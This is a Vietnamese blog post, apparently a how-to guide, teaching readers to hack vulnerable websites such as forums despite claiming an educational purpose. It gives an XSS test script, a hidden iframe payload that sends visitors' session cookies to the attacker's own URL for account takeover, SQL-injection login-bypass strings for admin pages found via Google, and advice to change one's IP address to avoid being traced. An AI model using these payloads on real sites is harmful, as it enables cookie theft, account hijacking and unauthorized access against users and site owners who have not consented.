Làm thế nào để hack website? Dù hack mọi trang là không thể nhưng bạn hoàn toàn có thể truy cập trái phép vào những trang dễ tấn công, chẳng hạn như một diễn đàn. Trong bài đăng này, TaiNgheTroThinh sẽ chỉ dẫn bạn cách hack website thông qua khai thác lỗ hổng cross site scripting (XSS), những kỹ thuật tấn công bằng mã độc hại cũng như đưa ra một vài lời khuyên để bạn có được sự chuẩn bị cần thiết cho thành công trong lĩnh vực này. Lưu ý: bài đăng này được viết hoàn toàn với mục đích giáo dục – nhằm giúp người đọc bắt đầu học về cách hack hợp pháp cũng như nhận biết cách thức làm việc của hacker để tự bảo vệ tốt hơn.
những bước
Phương pháp số 1 dùng XSS
1Tìm một trang dễ tấn công cho phép bạn đăng tải nội dung, chẳng hạn như một diễn đàn nào đó. Lưu ý rằng phương pháp này không hiệu quả với những trang an toàn. 2Vào và đăng tải nội dung. Bạn sẽ phải nhập một vài code (mã lập trình) đặc biệt vào phần “post” (Đăng) để thu thập toàn bộ dữ liệu của những người nhấp chuột vào nó. Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng <script>window.alert(“test”)</script>Nếu hộp cảnh báo xuất hiện khi bạn nhấp chuột vào bài đăng thì nghĩa là website đó không an toàn.3Tạo và tải chương trình đánh chặn cookie của bạn. Mục đích của cuộc tấn công này là chiếm được cookie của người dùng, từ đó truy cập vào tài khoản trên những website có quy trình đăng nhập không an toàn. Lúc này, bạn cần chương trình đánh chặn cookie nhằm chiếm và chuyển hướng cookie của đối tượng mục tiêu. Hãy tải chương trình này lên website hỗ trợ php mà bạn có thể truy cập vào và tham khảo thêm về code của những chương trình đánh chặn. 4Đăng chương trình đánh chặn cookie của bạn. Nhập mã phù hợp vào bài đăng được dùng để chiếm cookie và gửi chúng về trang của bạn. Bạn nên nhập một vài văn bản sau đoạn code để bài đăng bớt đáng ngờ và không bị xóa. Chẳng hạn như bạn có thể dùng <iframe frameborder=”0″ height=”0″ width=”0″ src=”javascript…:void(document.location=`YOURURL/cookiecatcher.php?c=` document.cookie)></iframe>5dùng cookie thu thập được. Lúc này, bạn có thể dùng tùy ý thông tin cookie được lưu vào website của bạn
Phương pháp số 2 Tấn công bằng cách chèn mã độc
1Tìm trang dễ tấn công. Bạn nên tìm những trang có lỗ hổng trong quy trình đăng nhập quản trị. Hãy thử tìm từ khóa admin login.asp trên Google. 2Đăng nhập với quyền quản trị. Dùng admin cho tên đăng nhập và thử một vài chuỗi ký tự khác nhau cho phần mật khẩu. Đó có thể là bất kỳ chuỗi nào, thường gặp có thể kể đến 1’, ’1’=`1 hoặc 2`=`2. 3Hãy kiên nhẫn. Nhiều khả năng bạn sẽ phải thử nhiều lần. 4Truy cập website. Với những trang dễ tấn công, rồi bạn cũng sẽ tìm được chuỗi ký tự cho phép bạn truy cập bằng quyền quản trị
Phương pháp số 3 Tạo tiền đề để thành công
1Học một vài ngôn ngữ lập trình. Để hack một cách thực thụ, bạn cần hiểu cách thức hoạt động của máy tính và những công nghệ khác. Việc học cách dùng những ngôn ngữ lập trình như Python hay SQL sẽ giúp bạn có được kiểm soát tốt hơn với máy tính và nhận diện được điểm yếu bảo mật trong những hệ thống. 2Trang bị kiến thức HTML cơ bản. Bạn cũng cần hiểu sâu về html và javascript, đặc biệt là trong trường hợp bạn muốn hack những website. Dù việc học tiêu tốn thời gian nhưng có vô số Phương pháp bạn có thể học miễn phí trên internet. Chỉ cần bạn muốn, cơ hội vẫn là của bạn. 3Tham khảo ý kiến “whitehat” – chuyên gia bảo mật máy tính. Họ là những hacker dùng khả năng của mình cho những mục tiêu tốt đẹp, khai thác lỗ hổng bảo mật và cải thiện môi trường internet cho tất cả mọi người. Nếu muốn học hack và dùng khả năng của mình một cách đúng đắn hay đơn giản là để bảo vệ website của mình thì bạn nên liên hệ và xin lời khuyên từ những chuyên gia này. 4Tìm hiểu về hack. Nếu muốn học cách hack hay tự bảo vệ mình, bạn sẽ phải nghiên cứu khá nhiều. Website có thể bị tấn công theo vô số cách khác nhau và danh sách này biến đổi mỗi ngày. Do đó, bạn sẽ phải không ngừng học hỏi. 5Cập nhật. Bởi kỹ thuật hack không ngừng thay đổi, bạn cần không ngừng cập nhật. Chỉ vì lúc này được bảo vệ trước một vài loại hack nào đó không có nghĩa là trong tương lai, bạn vẫn an toàn!
Lời khuyên
Vào diễn đàn dành cho hacker để có được nhiều lời khuyên hữu ích.Chỉ dẫn này được viết hoàn toàn vì mục tiêu giáo dục, với mong muốn giúp mọi người bắt đầu học hack một cách đúng đắn cũng như nhận biết cách thức làm việc của hacker để có thể tự bảo vệ tốt hơn.
Cảnh báo
Đọc xong bài này, bạn không thể trở thành hacker ngay. Bạn PHẢI trau dồi những kỹ năng và không ngừng luyện tập, luyện tập và luyện tập.Nếu định hack thật sự, bạn nên đổi địa chỉ IP bằng những phần mềm sẵn có trên mạng.